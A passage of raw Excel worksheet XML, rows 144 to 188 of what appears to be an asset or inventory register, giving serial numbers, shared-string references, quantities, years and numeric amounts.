      </c>
      <c r="L144" s="238" t="s">
        <v>1714</v>
      </c>
    </row>
    <row r="145" customHeight="1" spans="2:12">
      <c r="B145" s="16">
        <v>139</v>
      </c>
      <c r="C145" s="237" t="s">
        <v>1715</v>
      </c>
      <c r="D145" s="238" t="s">
        <v>1716</v>
      </c>
      <c r="E145" s="238" t="s">
        <v>1717</v>
      </c>
      <c r="F145" s="11"/>
      <c r="G145" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H145" s="11">
        <v>2</v>
      </c>
      <c r="I145" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J145" s="126">
        <v>286000</v>
      </c>
      <c r="K145" s="188">
        <v>34560</v>
      </c>
      <c r="L145" s="238" t="s">
        <v>1718</v>
      </c>
    </row>
    <row r="146" customHeight="1" spans="2:12">
      <c r="B146" s="16">
        <v>140</v>
      </c>
      <c r="C146" s="237" t="s">
        <v>1719</v>
      </c>
      <c r="D146" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E146" s="238" t="s">
        <v>1543</v>
      </c>
      <c r="F146" s="11"/>
      <c r="G146" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H146" s="11">
        <v>1</v>
      </c>
      <c r="I146" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J146" s="126">
        <v>21400</v>
      </c>
      <c r="K146" s="188">
        <v>6400</v>
      </c>
      <c r="L146" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="147" customHeight="1" spans="2:12">
      <c r="B147" s="16">
        <v>141</v>
      </c>
      <c r="C147" s="237" t="s">
        <v>1721</v>
      </c>
      <c r="D147" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E147" s="238" t="s">
        <v>1543</v>
      </c>
      <c r="F147" s="11"/>
      <c r="G147" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H147" s="11">
        <v>3</v>
      </c>
      <c r="I147" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J147" s="126">
        <v>49500</v>
      </c>
      <c r="K147" s="188">
        <v>19200</v>
      </c>
      <c r="L147" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="148" customHeight="1" spans="2:12">
      <c r="B148" s="16">
        <v>142</v>
      </c>
      <c r="C148" s="237" t="s">
        <v>1722</v>
      </c>
      <c r="D148" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E148" s="238" t="s">
        <v>1543</v>
      </c>
      <c r="F148" s="11"/>
      <c r="G148" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H148" s="11">
        <v>1</v>
      </c>
      <c r="I148" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J148" s="126">
        <v>20000</v>
      </c>
      <c r="K148" s="188">
        <v>6400</v>
      </c>
      <c r="L148" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="149" customHeight="1" spans="2:12">
      <c r="B149" s="16">
        <v>143</v>
      </c>
      <c r="C149" s="237" t="s">
        <v>1723</v>
      </c>
      <c r="D149" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E149" s="238" t="s">
        <v>1724</v>
      </c>
      <c r="F149" s="11"/>
      <c r="G149" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H149" s="11">
        <v>4</v>
      </c>
      <c r="I149" s="237" t="s">
        <v>1539</v>
      </c>
      <c r="J149" s="126">
        <v>422807</v>
      </c>
      <c r="K149" s="188">
        <v>38400</v>
      </c>
      <c r="L149" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="150" customHeight="1" spans="2:12">
      <c r="B150" s="16">
        <v>144</v>
      </c>
      <c r="C150" s="237" t="s">
        <v>1725</v>
      </c>
      <c r="D150" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E150" s="238" t="s">
        <v>1726</v>
      </c>
      <c r="F150" s="11"/>
      <c r="G150" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H150" s="11">
        <v>1</v>
      </c>
      <c r="I150" s="237" t="s">
        <v>1539</v>
      </c>
      <c r="J150" s="126">
        <v>36073</v>
      </c>
      <c r="K150" s="188">
        <v>9600</v>
      </c>
      <c r="L150" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="151" customHeight="1" spans="2:12">
      <c r="B151" s="16">
        <v>145</v>
      </c>
      <c r="C151" s="237" t="s">
        <v>1727</v>
      </c>
      <c r="D151" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E151" s="238" t="s">
        <v>1728</v>
      </c>
      <c r="F151" s="11"/>
      <c r="G151" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H151" s="11">
        <v>2</v>
      </c>
      <c r="I151" s="237" t="s">
        <v>1539</v>
      </c>
      <c r="J151" s="126">
        <v>219703</v>
      </c>
      <c r="K151" s="188">
        <v>19200</v>
      </c>
      <c r="L151" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="152" customHeight="1" spans="2:12">
      <c r="B152" s="16">
        <v>146</v>
      </c>
      <c r="C152" s="237" t="s">
        <v>1729</v>
      </c>
      <c r="D152" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E152" s="238" t="s">
        <v>1730</v>
      </c>
      <c r="F152" s="11"/>
      <c r="G152" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H152" s="11">
        <v>1</v>
      </c>
      <c r="I152" s="237" t="s">
        <v>1539</v>
      </c>
      <c r="J152" s="126">
        <v>124168</v>
      </c>
      <c r="K152" s="188">
        <v>9600</v>
      </c>
      <c r="L152" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="153" customHeight="1" spans="2:12">
      <c r="B153" s="16">
        <v>147</v>
      </c>
      <c r="C153" s="237" t="s">
        <v>1731</v>
      </c>
      <c r="D153" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E153" s="238" t="s">
        <v>1732</v>
      </c>
      <c r="F153" s="11"/>
      <c r="G153" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H153" s="11">
        <v>1</v>
      </c>
      <c r="I153" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J153" s="126">
        <v>34486</v>
      </c>
      <c r="K153" s="188">
        <v>11200</v>
      </c>
      <c r="L153" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="154" customHeight="1" spans="2:12">
      <c r="B154" s="16">
        <v>148</v>
      </c>
      <c r="C154" s="237" t="s">
        <v>1733</v>
      </c>
      <c r="D154" s="238" t="s">
        <v>1734</v>
      </c>
      <c r="E154" s="238" t="s">
        <v>1724</v>
      </c>
      <c r="F154" s="11"/>
      <c r="G154" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H154" s="11">
        <v>1</v>
      </c>
      <c r="I154" s="237" t="s">
        <v>1735</v>
      </c>
      <c r="J154" s="126">
        <v>29781.9</v>
      </c>
      <c r="K154" s="188">
        <v>0</v>
      </c>
      <c r="L154" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="155" customHeight="1" spans="2:12">
      <c r="B155" s="16">
        <v>149</v>
      </c>
      <c r="C155" s="237" t="s">
        <v>1736</v>
      </c>
      <c r="D155" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E155" s="238" t="s">
        <v>1737</v>
      </c>
      <c r="F155" s="11"/>
      <c r="G155" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H155" s="11">
        <v>1</v>
      </c>
      <c r="I155" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J155" s="126">
        <v>33300</v>
      </c>
      <c r="K155" s="188">
        <v>11200</v>
      </c>
      <c r="L155" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="156" customHeight="1" spans="2:12">
      <c r="B156" s="16">
        <v>150</v>
      </c>
      <c r="C156" s="237" t="s">
        <v>1738</v>
      </c>
      <c r="D156" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E156" s="238" t="s">
        <v>1739</v>
      </c>
      <c r="F156" s="11"/>
      <c r="G156" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H156" s="11">
        <v>1</v>
      </c>
      <c r="I156" s="237" t="s">
        <v>1740</v>
      </c>
      <c r="J156" s="126">
        <v>8500</v>
      </c>
      <c r="K156" s="188">
        <v>896</v>
      </c>
      <c r="L156" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="157" customHeight="1" spans="2:12">
      <c r="B157" s="16">
        <v>151</v>
      </c>
      <c r="C157" s="237" t="s">
        <v>1741</v>
      </c>
      <c r="D157" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E157" s="238" t="s">
        <v>1531</v>
      </c>
      <c r="F157" s="11"/>
      <c r="G157" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H157" s="11">
        <v>5</v>
      </c>
      <c r="I157" s="237" t="s">
        <v>1740</v>
      </c>
      <c r="J157" s="126">
        <v>115500</v>
      </c>
      <c r="K157" s="188">
        <v>64000</v>
      </c>
      <c r="L157" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="158" customHeight="1" spans="2:12">
      <c r="B158" s="16">
        <v>152</v>
      </c>
      <c r="C158" s="237" t="s">
        <v>1742</v>
      </c>
      <c r="D158" s="238" t="s">
        <v>1743</v>
      </c>
      <c r="E158" s="238" t="s">
        <v>1724</v>
      </c>
      <c r="F158" s="11"/>
      <c r="G158" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H158" s="11">
        <v>1</v>
      </c>
      <c r="I158" s="237" t="s">
        <v>1459</v>
      </c>
      <c r="J158" s="126">
        <v>26300</v>
      </c>
      <c r="K158" s="188">
        <v>6732.8</v>
      </c>
      <c r="L158" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="159" customHeight="1" spans="2:12">
      <c r="B159" s="16">
        <v>153</v>
      </c>
      <c r="C159" s="237" t="s">
        <v>1744</v>
      </c>
      <c r="D159" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E159" s="238" t="s">
        <v>1745</v>
      </c>
      <c r="F159" s="11"/>
      <c r="G159" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H159" s="11">
        <v>1</v>
      </c>
      <c r="I159" s="237" t="s">
        <v>756</v>
      </c>
      <c r="J159" s="126">
        <v>47008.55</v>
      </c>
      <c r="K159" s="188">
        <v>17600</v>
      </c>
      <c r="L159" s="238" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="160" customHeight="1" spans="2:12">
      <c r="B160" s="16">
        <v>154</v>
      </c>
      <c r="C160" s="237" t="s">
        <v>1746</v>
      </c>
      <c r="D160" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E160" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F160" s="11"/>
      <c r="G160" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H160" s="11">
        <v>2</v>
      </c>
      <c r="I160" s="237" t="s">
        <v>958</v>
      </c>
      <c r="J160" s="126">
        <v>19329</v>
      </c>
      <c r="K160" s="188">
        <v>2320</v>
      </c>
      <c r="L160" s="238" t="s">
        <v>1747</v>
      </c>
    </row>
    <row r="161" customHeight="1" spans="2:12">
      <c r="B161" s="16">
        <v>155</v>
      </c>
      <c r="C161" s="237" t="s">
        <v>1748</v>
      </c>
      <c r="D161" s="238" t="s">
        <v>1749</v>
      </c>
      <c r="E161" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F161" s="11"/>
      <c r="G161" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H161" s="11">
        <v>1</v>
      </c>
      <c r="I161" s="237" t="s">
        <v>336</v>
      </c>
      <c r="J161" s="126">
        <v>25816</v>
      </c>
      <c r="K161" s="188">
        <v>1856</v>
      </c>
      <c r="L161" s="238" t="s">
        <v>1747</v>
      </c>
    </row>
    <row r="162" customHeight="1" spans="2:12">
      <c r="B162" s="16">
        <v>156</v>
      </c>
      <c r="C162" s="237" t="s">
        <v>1750</v>
      </c>
      <c r="D162" s="238" t="s">
        <v>1751</v>
      </c>
      <c r="E162" s="238" t="s">
        <v>1752</v>
      </c>
      <c r="F162" s="11"/>
      <c r="G162" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H162" s="11">
        <v>2</v>
      </c>
      <c r="I162" s="237" t="s">
        <v>1497</v>
      </c>
      <c r="J162" s="126">
        <v>11000</v>
      </c>
      <c r="K162" s="188">
        <v>720</v>
      </c>
      <c r="L162" s="238" t="s">
        <v>1753</v>
      </c>
    </row>
    <row r="163" customHeight="1" spans="2:12">
      <c r="B163" s="16">
        <v>157</v>
      </c>
      <c r="C163" s="237" t="s">
        <v>1754</v>
      </c>
      <c r="D163" s="238" t="s">
        <v>1755</v>
      </c>
      <c r="E163" s="10" t="s">
        <v>1756</v>
      </c>
      <c r="F163" s="11"/>
      <c r="G163" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H163" s="11">
        <v>1</v>
      </c>
      <c r="I163" s="237" t="s">
        <v>1757</v>
      </c>
      <c r="J163" s="126">
        <v>13350.43</v>
      </c>
      <c r="K163" s="188">
        <v>691.2</v>
      </c>
      <c r="L163" s="238" t="s">
        <v>1758</v>
      </c>
    </row>
    <row r="164" customHeight="1" spans="2:12">
      <c r="B164" s="16">
        <v>158</v>
      </c>
      <c r="C164" s="237" t="s">
        <v>1759</v>
      </c>
      <c r="D164" s="238" t="s">
        <v>1760</v>
      </c>
      <c r="E164" s="238" t="s">
        <v>1761</v>
      </c>
      <c r="F164" s="11"/>
      <c r="G164" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H164" s="11">
        <v>1</v>
      </c>
      <c r="I164" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J164" s="126">
        <v>40000</v>
      </c>
      <c r="K164" s="188">
        <v>8960</v>
      </c>
      <c r="L164" s="238" t="s">
        <v>1762</v>
      </c>
    </row>
    <row r="165" customHeight="1" spans="2:12">
      <c r="B165" s="16">
        <v>159</v>
      </c>
      <c r="C165" s="237" t="s">
        <v>1763</v>
      </c>
      <c r="D165" s="238" t="s">
        <v>1764</v>
      </c>
      <c r="E165" s="238" t="s">
        <v>1676</v>
      </c>
      <c r="F165" s="11"/>
      <c r="G165" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H165" s="11">
        <v>1</v>
      </c>
      <c r="I165" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J165" s="126">
        <v>11800</v>
      </c>
      <c r="K165" s="188">
        <v>928</v>
      </c>
      <c r="L165" s="238" t="s">
        <v>1765</v>
      </c>
    </row>
    <row r="166" customHeight="1" spans="2:12">
      <c r="B166" s="16">
        <v>160</v>
      </c>
      <c r="C166" s="237" t="s">
        <v>1766</v>
      </c>
      <c r="D166" s="238" t="s">
        <v>1767</v>
      </c>
      <c r="E166" s="238" t="s">
        <v>1676</v>
      </c>
      <c r="F166" s="11"/>
      <c r="G166" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H166" s="11">
        <v>1</v>
      </c>
      <c r="I166" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J166" s="126">
        <v>61200</v>
      </c>
      <c r="K166" s="188">
        <v>928</v>
      </c>
      <c r="L166" s="238" t="s">
        <v>1768</v>
      </c>
    </row>
    <row r="167" customHeight="1" spans="2:12">
      <c r="B167" s="16">
        <v>161</v>
      </c>
      <c r="C167" s="237" t="s">
        <v>1769</v>
      </c>
      <c r="D167" s="238" t="s">
        <v>1770</v>
      </c>
      <c r="E167" s="10"/>
      <c r="F167" s="11"/>
      <c r="G167" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H167" s="11">
        <v>1</v>
      </c>
      <c r="I167" s="237" t="s">
        <v>725</v>
      </c>
      <c r="J167" s="126">
        <v>9000</v>
      </c>
      <c r="K167" s="188">
        <v>928</v>
      </c>
      <c r="L167" s="238" t="s">
        <v>1187</v>
      </c>
    </row>
    <row r="168" customHeight="1" spans="2:12">
      <c r="B168" s="16">
        <v>162</v>
      </c>
      <c r="C168" s="237" t="s">
        <v>1771</v>
      </c>
      <c r="D168" s="238" t="s">
        <v>1772</v>
      </c>
      <c r="E168" s="238" t="s">
        <v>1773</v>
      </c>
      <c r="F168" s="11"/>
      <c r="G168" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H168" s="11">
        <v>4</v>
      </c>
      <c r="I168" s="237" t="s">
        <v>725</v>
      </c>
      <c r="J168" s="126">
        <v>155000</v>
      </c>
      <c r="K168" s="188">
        <v>198400</v>
      </c>
      <c r="L168" s="238" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="169" customHeight="1" spans="2:12">
      <c r="B169" s="16">
        <v>163</v>
      </c>
      <c r="C169" s="237" t="s">
        <v>1775</v>
      </c>
      <c r="D169" s="238" t="s">
        <v>1772</v>
      </c>
      <c r="E169" s="238" t="s">
        <v>1776</v>
      </c>
      <c r="F169" s="11"/>
      <c r="G169" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H169" s="11">
        <v>1</v>
      </c>
      <c r="I169" s="237" t="s">
        <v>1090</v>
      </c>
      <c r="J169" s="126">
        <v>5017.09</v>
      </c>
      <c r="K169" s="188">
        <v>1936</v>
      </c>
      <c r="L169" s="238" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="170" customHeight="1" spans="2:12">
      <c r="B170" s="16">
        <v>164</v>
      </c>
      <c r="C170" s="237" t="s">
        <v>1778</v>
      </c>
      <c r="D170" s="238" t="s">
        <v>1516</v>
      </c>
      <c r="E170" s="238" t="s">
        <v>1779</v>
      </c>
      <c r="F170" s="11"/>
      <c r="G170" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H170" s="11">
        <v>6</v>
      </c>
      <c r="I170" s="237" t="s">
        <v>1780</v>
      </c>
      <c r="J170" s="126">
        <v>7500</v>
      </c>
      <c r="K170" s="188">
        <v>2880</v>
      </c>
      <c r="L170" s="238" t="s">
        <v>1781</v>
      </c>
    </row>
    <row r="171" customHeight="1" spans="2:12">
      <c r="B171" s="16">
        <v>165</v>
      </c>
      <c r="C171" s="237" t="s">
        <v>1782</v>
      </c>
      <c r="D171" s="238" t="s">
        <v>1516</v>
      </c>
      <c r="E171" s="238" t="s">
        <v>1783</v>
      </c>
      <c r="F171" s="11"/>
      <c r="G171" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H171" s="11">
        <v>2</v>
      </c>
      <c r="I171" s="237" t="s">
        <v>1780</v>
      </c>
      <c r="J171" s="126">
        <v>4850</v>
      </c>
      <c r="K171" s="188">
        <v>960</v>
      </c>
      <c r="L171" s="238" t="s">
        <v>1784</v>
      </c>
    </row>
    <row r="172" customHeight="1" spans="2:12">
      <c r="B172" s="16">
        <v>166</v>
      </c>
      <c r="C172" s="237" t="s">
        <v>1785</v>
      </c>
      <c r="D172" s="238" t="s">
        <v>1516</v>
      </c>
      <c r="E172" s="238" t="s">
        <v>1786</v>
      </c>
      <c r="F172" s="11"/>
      <c r="G172" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H172" s="11">
        <v>2</v>
      </c>
      <c r="I172" s="237" t="s">
        <v>1780</v>
      </c>
      <c r="J172" s="126">
        <v>4850</v>
      </c>
      <c r="K172" s="188">
        <v>960</v>
      </c>
      <c r="L172" s="238" t="s">
        <v>1784</v>
      </c>
    </row>
    <row r="173" customHeight="1" spans="2:12">
      <c r="B173" s="16">
        <v>167</v>
      </c>
      <c r="C173" s="237" t="s">
        <v>1787</v>
      </c>
      <c r="D173" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="E173" s="238" t="s">
        <v>1788</v>
      </c>
      <c r="F173" s="11"/>
      <c r="G173" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H173" s="11">
        <v>1</v>
      </c>
      <c r="I173" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J173" s="126">
        <v>222000</v>
      </c>
      <c r="K173" s="188">
        <v>0</v>
      </c>
      <c r="L173" s="238" t="s">
        <v>1789</v>
      </c>
    </row>
    <row r="174" customHeight="1" spans="2:12">
      <c r="B174" s="16">
        <v>168</v>
      </c>
      <c r="C174" s="11"/>
      <c r="D174" s="10" t="s">
        <v>1790</v>
      </c>
      <c r="E174" s="10" t="s">
        <v>1349</v>
      </c>
      <c r="F174" s="11" t="s">
        <v>1453</v>
      </c>
      <c r="G174" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H174" s="11">
        <v>4</v>
      </c>
      <c r="I174" s="11">
        <v>2004</v>
      </c>
      <c r="J174" s="205"/>
      <c r="K174" s="188">
        <v>5568</v>
      </c>
      <c r="L174" s="191" t="s">
        <v>1791</v>
      </c>
    </row>
    <row r="175" customHeight="1" spans="2:12">
      <c r="B175" s="16">
        <v>169</v>
      </c>
      <c r="C175" s="11"/>
      <c r="D175" s="10" t="s">
        <v>1790</v>
      </c>
      <c r="E175" s="10" t="s">
        <v>1349</v>
      </c>
      <c r="F175" s="11" t="s">
        <v>1792</v>
      </c>
      <c r="G175" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H175" s="11">
        <v>5</v>
      </c>
      <c r="I175" s="11">
        <v>2006</v>
      </c>
      <c r="J175" s="205"/>
      <c r="K175" s="188">
        <v>8120</v>
      </c>
      <c r="L175" s="191" t="s">
        <v>1791</v>
      </c>
    </row>
    <row r="176" customHeight="1" spans="2:12">
      <c r="B176" s="16">
        <v>170</v>
      </c>
      <c r="C176" s="237" t="s">
        <v>1793</v>
      </c>
      <c r="D176" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E176" s="238" t="s">
        <v>1794</v>
      </c>
      <c r="F176" s="11"/>
      <c r="G176" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H176" s="11">
        <v>1</v>
      </c>
      <c r="I176" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J176" s="126">
        <v>130000</v>
      </c>
      <c r="K176" s="188">
        <v>0</v>
      </c>
      <c r="L176" s="238" t="s">
        <v>1795</v>
      </c>
    </row>
    <row r="177" customHeight="1" spans="2:12">
      <c r="B177" s="16">
        <v>171</v>
      </c>
      <c r="C177" s="11"/>
      <c r="D177" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E177" s="238" t="s">
        <v>1796</v>
      </c>
      <c r="F177" s="11" t="s">
        <v>1797</v>
      </c>
      <c r="G177" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H177" s="11">
        <v>1</v>
      </c>
      <c r="I177" s="11">
        <v>1992</v>
      </c>
      <c r="J177" s="126"/>
      <c r="K177" s="188">
        <v>4160</v>
      </c>
      <c r="L177" s="238" t="s">
        <v>1795</v>
      </c>
    </row>
    <row r="178" customHeight="1" spans="2:12">
      <c r="B178" s="16">
        <v>172</v>
      </c>
      <c r="C178" s="237" t="s">
        <v>1798</v>
      </c>
      <c r="D178" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E178" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F178" s="11"/>
      <c r="G178" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H178" s="11">
        <v>2</v>
      </c>
      <c r="I178" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J178" s="126">
        <v>28500</v>
      </c>
      <c r="K178" s="188">
        <v>1856</v>
      </c>
      <c r="L178" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="179" customHeight="1" spans="2:12">
      <c r="B179" s="16">
        <v>173</v>
      </c>
      <c r="C179" s="237" t="s">
        <v>1800</v>
      </c>
      <c r="D179" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E179" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F179" s="11"/>
      <c r="G179" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H179" s="11">
        <v>2</v>
      </c>
      <c r="I179" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J179" s="126">
        <v>22000</v>
      </c>
      <c r="K179" s="188">
        <v>1856</v>
      </c>
      <c r="L179" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="180" customHeight="1" spans="2:12">
      <c r="B180" s="16">
        <v>174</v>
      </c>
      <c r="C180" s="237" t="s">
        <v>1801</v>
      </c>
      <c r="D180" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E180" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F180" s="11"/>
      <c r="G180" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H180" s="11">
        <v>2</v>
      </c>
      <c r="I180" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J180" s="126">
        <v>26000</v>
      </c>
      <c r="K180" s="188">
        <v>1856</v>
      </c>
      <c r="L180" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="181" customHeight="1" spans="2:12">
      <c r="B181" s="16">
        <v>175</v>
      </c>
      <c r="C181" s="237" t="s">
        <v>1802</v>
      </c>
      <c r="D181" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E181" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F181" s="11"/>
      <c r="G181" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H181" s="11">
        <v>1</v>
      </c>
      <c r="I181" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J181" s="126">
        <v>7000</v>
      </c>
      <c r="K181" s="188">
        <v>928</v>
      </c>
      <c r="L181" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="182" customHeight="1" spans="2:12">
      <c r="B182" s="16">
        <v>176</v>
      </c>
      <c r="C182" s="237" t="s">
        <v>1803</v>
      </c>
      <c r="D182" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E182" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F182" s="11"/>
      <c r="G182" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H182" s="11">
        <v>1</v>
      </c>
      <c r="I182" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J182" s="126">
        <v>7000</v>
      </c>
      <c r="K182" s="188">
        <v>928</v>
      </c>
      <c r="L182" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="183" customHeight="1" spans="2:12">
      <c r="B183" s="16">
        <v>177</v>
      </c>
      <c r="C183" s="237" t="s">
        <v>1804</v>
      </c>
      <c r="D183" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E183" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F183" s="11"/>
      <c r="G183" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H183" s="11">
        <v>7</v>
      </c>
      <c r="I183" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J183" s="126">
        <v>70000</v>
      </c>
      <c r="K183" s="188">
        <v>6496</v>
      </c>
      <c r="L183" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="184" customHeight="1" spans="2:12">
      <c r="B184" s="16">
        <v>178</v>
      </c>
      <c r="C184" s="237" t="s">
        <v>1805</v>
      </c>
      <c r="D184" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E184" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F184" s="11"/>
      <c r="G184" s="16"/>
      <c r="H184" s="11">
        <v>5</v>
      </c>
      <c r="I184" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J184" s="126">
        <v>8800</v>
      </c>
      <c r="K184" s="188">
        <v>4640</v>
      </c>
      <c r="L184" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="185" customHeight="1" spans="2:12">
      <c r="B185" s="16">
        <v>179</v>
      </c>
      <c r="C185" s="237" t="s">
        <v>1806</v>
      </c>
      <c r="D185" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E185" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F185" s="11"/>
      <c r="G185" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H185" s="11">
        <v>1</v>
      </c>
      <c r="I185" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J185" s="126">
        <v>8800</v>
      </c>
      <c r="K185" s="188">
        <v>928</v>
      </c>
      <c r="L185" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="186" customHeight="1" spans="2:12">
      <c r="B186" s="16">
        <v>180</v>
      </c>
      <c r="C186" s="237" t="s">
        <v>1807</v>
      </c>
      <c r="D186" s="238" t="s">
        <v>1808</v>
      </c>
      <c r="E186" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F186" s="11"/>
      <c r="G186" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H186" s="11">
        <v>1</v>
      </c>
      <c r="I186" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J186" s="126">
        <v>1500</v>
      </c>
      <c r="K186" s="188">
        <v>320</v>
      </c>
      <c r="L186" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="187" customHeight="1" spans="2:12">
      <c r="B187" s="16">
        <v>181</v>
      </c>
      <c r="C187" s="237" t="s">
        <v>1809</v>
      </c>
      <c r="D187" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E187" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F187" s="11"/>
      <c r="G187" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H187" s="11">
        <v>1</v>
      </c>
      <c r="I187" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J187" s="126">
        <v>4500</v>
      </c>
      <c r="K187" s="188">
        <v>928</v>
      </c>
      <c r="L187" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="188" customHeight="1" spans="2:12">
      <c r="B188" s="16">
        <v>182</v>
      </c>
      <c r="C188" s="237" t="s">
        <v>1810</v>
      </c>
      <c r="D188" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E188" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F188" s="11"/>
      <c r="G188" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H188" s="11">
        <v>5</v>
      </c>
      <c r="I188" s="237" t="s">
        <v>336</v>
      </c>
      <c r="J188" s="126">
        <v>67282</v>
      </c>
      <c r="K188" s="188">
        <v>9280</v>
      </c>
